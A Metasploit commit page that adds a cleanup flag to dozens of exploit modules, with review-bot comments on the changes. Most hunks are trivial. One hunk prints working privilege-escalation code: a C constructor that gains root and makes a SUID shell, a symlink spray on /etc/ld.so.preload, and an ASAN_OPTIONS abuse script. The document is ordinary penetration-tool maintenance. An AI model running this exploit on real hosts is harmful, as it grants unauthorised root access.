
Land #12158, needs_cleanup for on_new_session

wvu-r7 committed Aug 2, 2019
2 parents d9d48ff + e11de69 commit 6572fa93c4ee77651c5a6d7b17584f3e7d2f700d
Showing with 174 additions and 67 deletions.
  1. +2 −0 modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
  2. +2 −0 modules/exploits/linux/http/microfocus_secure_messaging_gateway.rb
  3. +2 −0 modules/exploits/linux/http/nagios_xi_chained_rce.rb
  4. +2 −0 modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
  5. +1 −0 modules/exploits/linux/http/webid_converter.rb
  6. +2 −0 modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
  7. +36 −34 modules/exploits/linux/local/asan_suid_executable_priv_esc.rb
  8. +2 −0 modules/exploits/multi/http/extplorer_upload_exec.rb
  9. +2 −0 modules/exploits/multi/http/glossword_upload_exec.rb
  10. +2 −0 modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
  11. +2 −0 modules/exploits/multi/http/hyperic_hq_script_console.rb
  12. +2 −0 modules/exploits/multi/http/jenkins_script_console.rb
  13. +2 −0 modules/exploits/multi/http/kordil_edms_upload_exec.rb
  14. +2 −0 modules/exploits/multi/http/mutiny_subnetmask_exec.rb
  15. +2 −0 modules/exploits/multi/http/navigate_cms_rce.rb
  16. +3 −1 modules/exploits/multi/http/orientdb_exec.rb
  17. +2 −0 modules/exploits/multi/http/qdpm_upload_exec.rb
  18. +8 −6 modules/exploits/multi/http/struts_code_exec.rb
  19. +8 −6 modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
  20. +2 −0 modules/exploits/multi/http/struts_default_action_mapper.rb
  21. +2 −0 modules/exploits/multi/http/testlink_upload_exec.rb
  22. +6 −4 modules/exploits/multi/http/webpagetest_upload_exec.rb
  23. +2 −0 modules/exploits/multi/php/wp_duplicator_code_inject.rb
  24. +2 −0 modules/exploits/unix/dhcp/bash_environment.rb
  25. +2 −0 modules/exploits/unix/webapp/drupal_coder_exec.rb
  26. +2 −0 modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb
  27. +2 −0 modules/exploits/unix/webapp/moinmoin_twikidraw.rb
  28. +8 −6 modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
  29. +6 −4 modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb
  30. +2 −0 modules/exploits/unix/webapp/xoda_file_upload.rb
  31. +2 −0 modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
  32. +2 −0 modules/exploits/windows/browser/honeywell_tema_exec.rb
  33. +2 −0 modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
  34. +2 −0 modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
  35. +1 −0 modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
  36. +2 −0 modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb
  37. +2 −0 modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
  38. +2 −0 modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
  39. +2 −0 modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb
  40. +7 −5 modules/exploits/windows/http/cyclope_ess_sqli.rb
  41. +2 −0 modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb
  42. +2 −0 modules/exploits/windows/http/oracle_btm_writetofile.rb
  43. +2 −0 modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
  44. +2 −0 modules/exploits/windows/http/tomcat_cgi_cmdlineargs.rb
  45. +3 −1 modules/exploits/windows/http/umbraco_upload_aspx.rb
  46. +2 −0 modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb
  47. +2 −0 modules/exploits/windows/iis/ms01_026_dbldecode.rb
  48. +2 −0 modules/exploits/windows/iis/msadc.rb
  49. +2 −0 modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
  50. +2 −0 modules/exploits/windows/misc/altiris_ds_sqli.rb
  51. +2 −0 modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
  52. +1 −0 modules/exploits/windows/novell/file_reporter_fsfui_upload.rb
  53. +2 −0 modules/exploits/windows/novell/netiq_pum_eval.rb
  54. +2 −0 modules/exploits/windows/nuuo/nuuo_cms_fu.rb
  55. +2 −0 modules/exploits/windows/oracle/client_system_analyzer_upload.rb
@@ -83,6 +83,8 @@ def initialize(info = {})
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))

self.needs_cleanup = true
end

def p(offset)
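Review bot: The added `self.needs_cleanup = true` at the end of `initialize` has no comment saying what the module leaves on the target or where it is removed, and the next method visible in this hunk is `p`, not `on_new_session`. Going by the commit title the cleanup lives in `on_new_session`, which presumably only runs once a session opens, so a run that writes files but gets no session would leave them in place; that is worth stating for whoever has to account for changes on the tested host afterwards. I would add a line above the assignment such as `# Artifacts are removed in on_new_session; they remain on the target if no session is created`. The same bare assignment recurs in the other `initialize` hunks on this page, and `initialize` starts outside each of them.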
@@ -54,6 +54,8 @@ def initialize(info={})
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)

self.needs_cleanup = true
end

def execute_query(query)
@@ -38,6 +38,8 @@ def initialize(info = {})
OptInt.new('USER_ID', [true, 'User ID in the database to target', 1]),
OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
])

self.needs_cleanup = true
end

def check
@@ -49,6 +49,8 @@ def initialize(info={})
'Privileged' => false,
'DisclosureDate' => "May 17 2012",
'DefaultTarget' => 0))

self.needs_cleanup = true
end


@@ -48,6 +48,7 @@ def initialize(info = {})
], self.class
)

self.needs_cleanup = true
end

def check
@@ -68,6 +68,8 @@ def initialize(info = {})
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]

self.needs_cleanup = true
end

def base_dir
@@ -75,6 +75,8 @@ def initialize(info = {})
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]

self.needs_cleanup = true
end

def base_dir
@@ -206,50 +208,50 @@ def exploit

lib_name = ".#{rand_text_alphanumeric 5..10}"
lib_path = "#{base_dir}/#{lib_name}.so"
lib = <<-EOF
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("#{@rootshell_path}", 0, 0);
chmod("#{@rootshell_path}", 04755);
_exit(0);
}
lib = <<~EOF
#include <stdlib.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
void init(void) __attribute__((constructor));
void __attribute__((constructor)) init() {
if (setuid(0) || setgid(0))
_exit(1);
unlink("/etc/ld.so.preload");
chown("#{@rootshell_path}", 0, 0);
chmod("#{@rootshell_path}", 04755);
_exit(0);
}
EOF
upload_and_compile lib_path, lib, '-fPIC -shared -ldl -Wall'

spray_name = ".#{rand_text_alphanumeric 5..10}"
spray_path = "#{base_dir}/#{spray_name}"
spray = <<-EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
spray = <<~EOF
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
pid_t pid = getpid();
char buf[64];
for (int i=0; i<=#{datastore['SPRAY_SIZE']}; i++) {
snprintf(buf, sizeof(buf), "#{@log_prefix}.%ld", (long)pid+i);
symlink("/etc/ld.so.preload", buf);
}
}
EOF
upload_and_compile spray_path, spray, '-Wall'

exp_name = ".#{rand_text_alphanumeric 5..10}"
exp_path = "#{base_dir}/#{exp_name}"
exp = <<-EOF
#!/bin/sh
#{spray_path}
ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
#{lib_path}
' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
exp = <<~EOF
#!/bin/sh
#{spray_path}
ASAN_OPTIONS="disable_coredump=1 suppressions='/#{@log_prefix}
#{lib_path}
' log_path=./#{@log_prefix} verbosity=0" "#{suid_exe_path}" >/dev/null 2>&1
ASAN_OPTIONS='disable_coredump=1 abort_on_error=1 verbosity=0' "#{suid_exe_path}" >/dev/null 2>&1
EOF
upload_and_chmodx exp_path, exp
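Review bot: The three heredocs in `exploit` (`lib`, `spray`, `exp`) switch from `<<-EOF` to `<<~EOF`, which changes the text of the generated files, yet the commit title only mentions `needs_cleanup`. `<<~` strips the common leading indentation, so if the old bodies were indented (the page has lost indentation, so this cannot be confirmed here) the emitted C and shell sources differ from before, including the multi-line `ASAN_OPTIONS` value in `exp`. The commit message should record that as a behaviour change, and a comment above `exp` would help the next maintainer, for example `# <<~ strips the common indent; the ASAN_OPTIONS value spans lines and is whitespace-sensitive`. `exploit` starts and ends outside this hunk.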

@@ -49,6 +49,8 @@ def initialize(info={})
OptString.new('TARGETURI', [true, 'The path to the web application', '/com_extplorer_2.1.0/']),
OptString.new('USERNAME', [true, 'The username for eXtplorer', 'admin'])
])

self.needs_cleanup = true
end

def check
@@ -42,6 +42,8 @@ def initialize(info={})
OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']),
OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin'])
])

self.needs_cleanup = true
end

def check
@@ -65,6 +65,8 @@ def initialize(info = {})
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/'])
])

self.needs_cleanup = true
end

def on_new_session(client)
@@ -52,6 +52,8 @@ def initialize(info = {})
OptString.new('PASSWORD', [ true, 'The password for the application', 'hqadmin' ]),
OptString.new('TARGETURI', [ true, 'The path to HypericHQ', '/' ]),
])

self.needs_cleanup = true
end

#
@@ -61,6 +61,8 @@ def initialize(info = {})
OptString.new('API_TOKEN', [ false, 'The API token for the specified username', '' ]),
OptString.new('TARGETURI', [ true, 'The path to the Jenkins-CI application', '/jenkins/' ])
])

self.needs_cleanup = true
end

def post_auth?
@@ -40,6 +40,8 @@ def initialize(info={})
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
])

self.needs_cleanup = true
end

def check
@@ -73,6 +73,8 @@ def initialize(info = {})
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'mutiny' ])
])

self.needs_cleanup = true
end

def lookup_lhost()
@@ -45,6 +45,8 @@ def initialize(info = {})
register_options [
OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']),
]

self.needs_cleanup = true
end

def login_bypass
@@ -1,5 +1,5 @@
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

@@ -47,6 +47,8 @@ def initialize(info = {})
OptString.new('PASSWORD', [ true, 'HTTP Basic Auth Password', 'writer' ]),
OptString.new('TARGETURI', [ true, 'The path to the OrientDB application', '/' ])
])

self.needs_cleanup = true
end

def check
@@ -54,6 +54,8 @@ def initialize(info={})
OptString.new('USERNAME', [true, 'The username to login with']),
OptString.new('PASSWORD', [true, 'The password to login with'])
])

self.needs_cleanup = true
end

def check
@@ -55,12 +55,14 @@ def initialize(info = {})
'DisclosureDate' => 'Jul 13 2010',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])

self.needs_cleanup = true
end

def execute_command(cmd, opts = {})
@@ -63,12 +63,14 @@ def initialize(info = {})
'DisclosureDate' => 'Jan 06 2012',
'DefaultTarget' => 2))

register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
])

self.needs_cleanup = true
end

def execute_command(cmd, opts = {})
@@ -73,6 +73,8 @@ def initialize(info = {})
# It isn't OptPath becuase it's a *remote* path
OptString.new("WritableDir", [ true, "A directory where we can write files (only on Linux targets)", "/tmp" ])
])

self.needs_cleanup = true
end

def on_new_session(session)
@@ -52,6 +52,8 @@ def initialize(info={})
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/testlink-1.9.3/'])
])

self.needs_cleanup = true
end

def check
@@ -46,10 +46,12 @@ def initialize(info={})
'DisclosureDate' => "Jul 13 2012",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
])
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])
])

self.needs_cleanup = true
end


@@ -47,6 +47,8 @@ def initialize(info = {})
OptString.new('TARGETURI', [true, "The TARGETURI where installer.php or installer-backup.php is located", "/installer.php"]),
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 40]),
])

self.needs_cleanup = true
end

def check
@@ -61,6 +61,8 @@ def initialize(info = {})
))

deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')

self.needs_cleanup = true
end

def on_new_session(session)
@@ -58,6 +58,8 @@ def initialize(info={})
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
]
)

self.needs_cleanup = true
end

def check
@@ -56,6 +56,8 @@ def initialize(info = {})
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/forums/"])
])

self.needs_cleanup = true
end

def base
@@ -62,6 +62,8 @@ def initialize(info = {})
OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])
])

self.needs_cleanup = true
end

def post_auth?
@@ -47,12 +47,14 @@ def initialize(info = {})
'DisclosureDate' => 'Jun 23 2012'
))

register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ])
])
register_options(
[
OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
OptString.new('USERNAME', [true, "The username to authenticate with" ]),
OptString.new('PASSWORD', [true, "The password to authenticate with" ])
])

self.needs_cleanup = true
end

